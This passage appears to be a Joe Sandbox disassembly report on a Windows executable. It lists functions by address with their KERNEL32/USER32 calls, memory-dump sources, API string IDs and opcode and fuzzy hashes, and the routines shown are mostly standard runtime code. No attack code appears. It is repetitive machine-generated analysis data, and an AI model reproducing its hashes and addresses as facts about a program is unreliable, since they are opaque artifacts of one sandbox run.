                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A55F
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A574
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A595
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5C2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5D3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 408c089a3b640914283472138efc63105aff7241411df2dd409cda215309df11
                                                                                                                                                                                                            • Instruction ID: d661c579c551c39ec14e56aea77414dc34ef77d06e05bd30556e993f60abf717
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 408c089a3b640914283472138efc63105aff7241411df2dd409cda215309df11
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3218E30B0F24262FA6873215645139E2525F447B4FD64774F93E7B7FAEE2CE8508221
                                                                                                                                                                                                            Function 00007FF7ACEA6F9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                            • Opcode ID: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction ID: d918e8db599752cf29f9031b10db7a9b60d58ced6bfa92792ba38df8122a5c67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11B132B1DB419AE750AB02E854339F2A0FB88BE5F854234DA1DA77A4CF3CD9548710
                                                                                                                                                                                                            Function 00007FF7ACE9A6C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A6D7
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A70D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A73A
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A74B
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A75C
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A777
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: b9ed1a4e590336ba34b9cc0adcda05e316cd19dcf21a64e85ad9e9ab5a233fdb
                                                                                                                                                                                                            • Instruction ID: 9e584828cc27954eba3c7436f5a115f7a9254a177db9df97f1ba97c328b33439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9ed1a4e590336ba34b9cc0adcda05e316cd19dcf21a64e85ad9e9ab5a233fdb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92118E30A0E34262FA1477215646139E2925F447F0F864374F93E7B7F6EE2CE8518621
                                                                                                                                                                                                            Function 00007FF7ACE8E3A4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            • Opcode ID: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction ID: 149e98c7fb8f21e79a5be1d6a6042506824430c6e169af427ea137f6122ce8bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E61033690D6C2A6EB34AF11D640278B7A0FB44B96F854171DA6C67BE5DF3CE4A0C710
                                                                                                                                                                                                            Function 00007FF7ACE8C7E8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction ID: 5fee9a97739454e2354908f6f28e05c8ea2689a6e792ba32351f65357aa05bc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F951F333A0E682A6E714EF15E500A39B395FB41B89F929171DA4F23758DF3CE841C710
                                                                                                                                                                                                            Function 00007FF7ACE82240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                            • Opcode ID: 1c75f085d0d1285afa7d256397b39d5154ba0e32df1410c11512219579e8eefc
                                                                                                                                                                                                            • Instruction ID: 56cec77e9a2617d97f894f5298dad615abcca14ae5f44ad646a0ee4f0f976c5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c75f085d0d1285afa7d256397b39d5154ba0e32df1410c11512219579e8eefc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35316E3260E68299EB24EB61E8551F9B360FF88784F850135EA4D5BB65DF3CD1058710
                                                                                                                                                                                                            Function 00007FF7ACE82620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF7ACE82748
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                            • Opcode ID: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction ID: e6f6eee56f05c49682eca42b02838a8d575fce1fde839ec727a98d34bd44ebd7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531527262EBC2A1E630AB10E4517EAB364FF84785FC14036E68D276A9DF3CD255CB50
                                                                                                                                                                                                            Function 00007FF7ACE98810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction ID: 60d9d95d3a6130d33c70eefa82176ddaa46a8fb77ca950c6324c67f5d670f9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F0AF71A1F742A5EA20AB20E844339D360BF897A2FD90735D56E662F0CF2CD008C720
                                                                                                                                                                                                            Function 00007FF7ACEA86D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction ID: 6eed861bbc9385c8c604a1f76d53db9e29344388df0e9869ea69a43e9442c698
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11B632D1DB836DF7787164D441375A8C06F553A6F8E4A31F56EAA2F6CE2CE4404120
                                                                                                                                                                                                            Function 00007FF7ACE9A790 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7AF
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7CE
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7F6
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A807
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A818
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: 1866f34fa7f79f3022db2fd0a4456b1afab4f469433fcd6442c1cb9f0b531661
                                                                                                                                                                                                            • Instruction ID: cb41e2ee8a7fe4f1eb77544f7537645b50f246577fa4e5a27cd87d5f010f3c7b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1866f34fa7f79f3022db2fd0a4456b1afab4f469433fcd6442c1cb9f0b531661
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11AF30E0E20261FA68B325564A179E2515F407F0FCA4374F93D7A7F6EE2CE9528221
                                                                                                                                                                                                            Function 00007FF7ACE9A624 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A635
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A654
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A67C
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A68D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: e6a4540a5dfa42a6e095f599f9e5a878cb7ff9b4d696c427789b65f028acb1c3
                                                                                                                                                                                                            • Instruction ID: 9f731da7d92178f95e245f3231131b2a67597fa5e19b16218576d10d8473a4da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6a4540a5dfa42a6e095f599f9e5a878cb7ff9b4d696c427789b65f028acb1c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80110330A0F20361F968762545521B9E2924F45364F8B47B4FA3E7A3F7ED2CF9518231
                                                                                                                                                                                                            Function 00007FF7ACE9F0C8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            • Opcode ID: 0a85a650483ad60012865602343b5a273e15b3a1a81ddf8674274c6c15df3bc7
